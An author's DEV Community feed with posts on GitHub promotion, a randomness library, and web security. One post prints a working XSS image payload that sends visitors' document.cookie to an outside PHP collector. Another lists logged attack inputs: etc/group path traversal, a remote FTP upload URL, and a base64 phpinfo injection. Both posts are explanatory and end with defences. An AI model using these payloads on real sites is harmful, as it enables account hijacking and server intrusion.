DEV Community: nastyox

1 Step to Incentivize Stars and Forks on GitHub

nastyox — Tue, 27 Oct 2020 16:52:38 +0000

As developers, we put a lot of work into our GitHub repos to make them as useful as possible for others, but great projects sometimes go under-appreciated, and under-starred. Asking for stars is tacky, but publicly thanking your supporters by name in your README file is a sign of appreciation that happens to incentivize more users to join the crowd. And implementation is just a copy and paste from my Repo Roster project. Wouldn't it be worth a click to you to see if your profile went live on a repo's README?

What does it look like?

I like to use rosters as the footer of my README. Here's an example from my Rando.js repo:

How do I implement it?

You can copy the markdown from my Repo Roster repo and fill in your username/repo data manually, or you can visit the Repo Roster website, paste in a link to your personal repo, and copy the resulting markdown. Then, just paste that wherever you want it to appear in your README. That's all there is to it! From then on, data about your supporters will automatically update right in your README.md file.

Stealing Accounts with an IMG Tag

nastyox — Thu, 06 Aug 2020 12:03:07 +0000

Imagine I'm telling you how awesome it was to be tweeted about by a page on twitter, and I show you this image:

That seems innocent enough. You you've just seen me get excited about something and share an image with you. You've learned a little bit about me, but you may not realize that I've also learned a little bit about you... like potentially where you live. Is this close?

Unless you're using a VPN, that might have caught you off guard. Don't worry; I'm not storing any data about you. I'm just making a point. <img> tags can be abused to scrape data from users. Hackers can even exploit this to steal other users' online accounts without them ever having a clue. I'll show you how.

Using images to scrape viewer data

Let's look at the code for the image above:



<img src="http://nastyox.com/images/rando-js-tweet" alt="Rando.js on JavaScript Daily"/>

The dirty little secret is that there's a reason that URL is missing an image file extension at the end. It's not an image; it's a PHP file, and that PHP file grabs your IP address and has a jolly old time with it before returning some image data to mimic an image URL. It's as easy as this:



<?php
    $ip = $_SERVER['REMOTE_ADDR'];

    //do whatever I want with the IP...

    readfile("rando-js-tweet.png");
?>

Now, if you've ever looked into web development at all, you know that everyone and their mother grabs your IP address and uses it to track you across the web. That's not new. What gets dangerous is when you start sending other data along with the URL.

Stealing accounts

I'm not actually going to set up a live showcase for this because I believe it's illegal, but I will give you real code that hackers can actually use to steal your account- because it's important to know what you're up against when it comes to web security. Here's the code:



<img src="http://nastyox.com/images/fake-sample-url" onload="var i=0;if(i++)this.src+='?c='+encodeURIComponent(document.cookie);"/>

All this code does is call the PHP file provided in the src with document.cookie as a parameter. If you post this code to a comment section, forum, or other platform that's not actively guarding against HTML injection, everyone that loads the image will unwittingly send their cookie data to your PHP file, which can grab the cookie data as simply as this:



<?php
    $cookies = rawurldecode($_GET["c"]);

    //browse your cookies for info that'll let me mimic your login...

    readfile("rando-js-tweet.png");
?>

Everything you need to get into someone's account is usually stored right there in their document.cookie. If it's not there, you can poke around in their window.localStoarge, window.sessionStorage, or any other client-side storage until you find what you want. This exploit requires neglect on the part of the web developer, but believe me, it happens.

A real-life example

In July of 2016, Pokemon GO hit phones across the world and gained a tremendous 45m daily active users within just two weeks. By August of that same year, players uncovered this neat little trick:

Yes, this really happened. Players were writing HTML in the names of their pokemon, and it was executing. I can't remember if you could see other players' pokemon on your device at that point or if accounts handled payment information, but you can imagine that the devs flipped out. I heard about name bolding/italicizing one night, and it was fixed the next morning.

If you just realized that you're vulnerable to this sort of attack, use htmlentities for PHP (or similar methods for other languages) to protect your users like so:



$postedText = htmlentities($postedText);

//Now, we can safely show other users this escaped text

It's just that simple. This will escape any HTML tags (including img tags) that hackers try to inject with their posted text. It's not just you that forgets to do this; it happens to the big guys too every now and then.

9 Steps to Get 100 Stars on GitHub

nastyox — Sun, 28 Jun 2020 15:17:53 +0000

We should start off with proof that this works. Here's a screenshot of the recent viewer analytics for my GitHub repo, which has just started to take off:

It's clear from this chart that I spent a little while trying to get stars in ways that flat-out don't work before I found the ways that do. I'm here to help you cut through the crap and focus on the methods that work.

1. Create a READ-ME with a pretty top section

Your READ-ME file is like your repo’s homepage. A good percentage of people will star your project just because it looks good, and not all users will scroll down past the top of your READ-ME, so make the top part as pretty as possible. Here’s how to create a READ-ME, and here’s a place to practice your markdown if needed. A recipe for success is a well-designed logo with a tagline underneath followed by shields and then a colorful splash image. Here's what I did with my repo; it's animated, so you can click here if you care to see it live:

2. Be concise

People have incredibly short attention spans. Cut all the excess wording out of your READ-ME and get down to brass tacks. If possible, show the user how to use your project in a quick gif. Here’s how to record your screen on a Mac and PC. Here’s the best online video to gif converter I’ve found.

3. Choose an open license

People don’t like when you’re selling them something. If possible, create a license for your repo that opens it up for free use. I chose the “Unlicense License”. This will be featured next to your READ-ME, and people will see it.

4. Have stars

It’s weird, but people are more willing to star your project if they see that others have already done so. Ask your friends to star your project to get the ball rolling. Do not create fake GitHub accounts to star your own project. GitHub will catch you after about 4 accounts, guaranteed.

5. Upload an eye-catching social card

When people share a link to your GitHub repo, it’ll be accompanied by whatever image you choose for your social card. Make it colorful enough to pop off the screen and provocative enough to be worth a click. Here’s how to upload one.

6. Advertise

There are a lot of platforms to post your project to for free. The ones that have worked best for my JavaScript-based repo (in order) are r/javascript, r/webdev, and r/npm on Reddit; Cooperpress- which runs the the biggest coding email newsletters (contact here); Dev.to; Hada News; Echo JS; Hacker News; Product Hunt; Twitter; Facebook; and LinkedIn. Lobsters is an invitation-only community that I don't have an in with yet, but you can post there as well if you do. If your repo is JavaScript-based like mine, you can also post to JavaScripting once you reach 80 stars. Even interacting with other users' repos on GitHub through contributions/stars/follows can lead to visits to your own repo. Don't overdo it with GitHub interactions though; you'll get flagged or banned or spam.

7. Engage in developer communities

Once you advertise on these communities, connect with people on them. They won’t find you unless you give them a reason to care that you exist. Find articles on Dev.to you like and actually like them/leave comments. Star projects on GitHub and contribute to other projects. Like and retweet people on Twitter.

8. Respond to feedback

People will respond to your posts on these communities with advice. Tell them that you’ve heard them and actually change your project to fit what the public wants. They’re explicitly telling you how to make the project worth starring, so listen.

9. Shout-out your supporters

Users are more likely to star/fork your repo if there's something in it for them. You can reward them by automatically displaying their username and avatar in your README with Repo Roster. Just paste a link to your repo into the website, and copy the resulting markdown into your README.

And a bonus...

You’re also welcome to leave your project in the comments here for others to check out, but please don’t just drop a spammy-looking link. Include your repo’s title and description with the link so people can get a sense of it at a glance. Something like "Rando.js is a micro-library that simplifies and secures randomness in JavaScript" is perfect. I’ll check them out too!

Six Ways a Russian Hacker Attacked My Website

nastyox — Mon, 16 Mar 2020 10:43:40 +0000

Six Ways a Russian Hacker Attacked My Website

Until today, the "russian hacker" seemed like a piece of news-hyped fantasy. It turns out, that just isn't the case. They're real. They've attacked me, and they can attack you.

I want to be very clear at the head of this, this article features REAL links to this russian hacker's files and everything I was able to trace back to him. I did not candy-coat anything at all. If you're uncomfortable clicking those links, don't. If you choose to click the links, use a VPN, avoid running his files on your computer, and be safe. I'm not responsible for anything that happens if you interact with his stuff.

As you may have guessed after seeing my intro image, the hacker attacked me with injections through an input on my webpage. Put simply, he typed code into a search bar to see if he could get my server to do what he wanted it to do instead of what I was telling it to do. Had I not been properly sanitizing the data I was collecting from this input, he would have been successful.

Now, I'm not going to dance around what happened or try to tell you anything in an abstract way. I think it's important to know what hackers are trying these days so we know how to best protect ourselves. So, I've decided to include an actual screenshot of the "searches" this hacker typed into my search bar here.

You can ignore the 0's at the end of each line and the "groupSites0" at the beginning of each line. Those are search filters that have nothing to do with the malicious aspect of each of these searches. Let's get to the meat of these attack methods.

Attack #1: "etc/group" file searching

"etc/group" files are something I just learned about, and that's part of the reason this article is listed as a "discussion" piece. I'll tell you what I know, and please let me know in the comments if you have more to offer. To my knowledge, this hacker was assuming I use a Linix/UNIX operating system for my server. With Linix/UNIX operating systems, etc/group files contain a list of all users that have permissions for the server, which would be a great thing to have if you were trying to pretend to be me and gain access to my backend. The "../" here just means that he's trying to access parent directories within my backend's filesystem. That's not hugely relevant to the attack method here.

Attack #2: FTP file injection

This is by far my favorite attack that the hacker used. He was trying to upload a file to my server from his own, but he wasn't counting on me recording his searches for database backup purposes. By trying to connect his FTP to my server, he gave me access to his files. You see that URL in line 671 above? That's his real FTP, and you can visit it at ftp://ref:ref@dahli.rosinter.ru:21, though I'll save you the trouble if you are understandably wary. I'm including a screenshot of his files available at that link here.

He has a lot of files about a company called Qlik, and his FTP's parent domain either is or is pretending to be a Russian food company. That test.txt file you see there is what he was trying to upload to my server. What's in it? Nothing actually harmful, just a bit ominous.

Attack #3: "phpinfo" probing

phpinfo basically tells you everything about my PHP settings. It'll tell you what version of PHP I'm operating on, how long I let scripts run for before automatically terminating them, what environment variables I'm trying to hide from prying eyes, and a ton of other juicy goodies. But really, what the hacker is looking for here is just to see whether he can get any info out of me at all. Before trying to figure out what my thousands of users' passwords are, it's easier to ask for phpinfo to see if I'm even vulnerable to an attack in the first place.

Attack #4: Base64 injection

This one's another phpinfo probe in disguise. Base64 strings are usually used as the text-formatted version of images, but this one is the text format of a PHP file. And when you decode data:;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==, guess command you get? That's right, <?php phpinfo(); ?>. Feel free to try it yourself here.

Attack #5: Further "etc/group" file searching

The attacker had no luck with his first "etc/group" file search, so he figured it'd be worth one more go in a different directory. No luck there either, but nice try.

Attack #6: w;w;w

I actually don't get this one. It almost seems like he's trying to set write permissions for himself? I'd love if the community could chip in in the comment section to let me know what this could be.

The Scariest Part...

I timestamp every search that goes into my searchbar. Every single one of these six searches were executed within a timespan of 30 seconds (from 6:36:32 AM through 6:36:59 AM). That means this person has this whole process automated. He goes from site to site, poking around to find any holes that he can exploit, and when he finds one, he knows plenty of ways to take advantage and get what he wants. And he does it all through VPN connections that don't trace back to him. If you're interested, here are the IPs he used:

82.150.140.160 (not blacklisted, in Amsterdam, Netherlands)
79.170.40.224 (blacklisted, in London, UK)
79.170.40.225 (heavily blacklisted, in London, UK)

Please use this as an opportunity to learn and take caution with your development. Not everyone plays by the rules.

nastyox

Rando.js: replacing Math.random()

nastyox — Sun, 08 Mar 2020 04:43:48 +0000

🙉 What's all the hullabaloo?

There's now a vastly better alternative to JavaScript's built-in Math.random() that will make your life easier. Rando.js helps JavaScript developers code randomness more simply, readably, and securely. Whether you need to find a random int/float between two numbers, pick a random value from an array, choose a random element from your jQuery object, grab a character from a string, toss a coin, or do anything of the like while even preventing repetitions, we've got you covered at a cryptographically strong level. The best part? Our library is extremely lightweight and developer friendly- which means it won't take a toll on your project, and it's uber-simple to implement. Find it online and on GitHub.

⚡ Fast implementation

Step 1: Paste the following script tag into the head of your HTML document:

<script src="https://randojs.com/2.0.0.js"></script>

Or, use npm:

//Install:
npm i @nastyox/rando.js@2.0.0

//Then, paste this at the top of your JavaScript file:
const randojs = require('@nastyox/rando.js'), rando = randojs.rando, randoSequence = randojs.randoSequence;

Step 2: Use any of the commands explained at https://randojs.com/ in the document's JavaScript as you like.

🎉 Examples

   rando()                       //a floating-point number between 0 and 1 (could be exactly 0, but never exactly 1)  
   rando(5)                      //an integer between 0 and 5 (could be 0 or 5)  
   rando(5, 10)                  //a random integer between 5 and 10 (could be 5 or 10)  
   rando(5, "float")             //a floating-point number between 0 and 5 (could be exactly 0, but never exactly 5)  
   rando(5, 10, "float")         //a floating-point number between 5 and 10 (could be exactly 5, but never exactly 10)  
   rando(true, false)            //either true or false  
   rando(["a", "b"])             //{index:..., value:...} object representing a value of the provided array OR false if array is empty  
   rando({a: 1, b: 2})           //{key:..., value:...} object representing a property of the provided object OR false if object has no properties  
   rando($("div"))               //{index:..., value:...} object representing a jQuery element from the provided jQuery element set OR false if the provided jQuery element set does not contain any elements  
   rando("Gee willikers!")       //a character from the provided string OR false if the string is empty. Reoccurring characters will naturally form a more likely return value  
   rando(null)                   //ANY invalid arguments return false

⇢ Prevent repetitions by grabbing a sequence and looping through it

   randoSequence(5)              //an array of integers from 0 through 5 in random order  
   randoSequence(5, 10)          //an array of integers from 5 through 10 in random order  
   randoSequence(["a", "b"])     //an array of {index:..., value:...} objects representing the values of the provided array in random order  
   randoSequence({a: 1, b: 2})   //an array of {key:..., value:...} objects representing the properties of the provided object in random order  
   randoSequence($("div"))       //an array of {index:..., value:...} objects representing all jQuery elements from the provided jQuery element set in random order  
   randoSequence("Good gravy!")  //an array of the characters of the provided string in random order  
   randoSequence(null)           //ANY invalid arguments return false

If you find this project helpful, please take a second to bookmark the website/leave it a star on GitHub. Thanks everyone.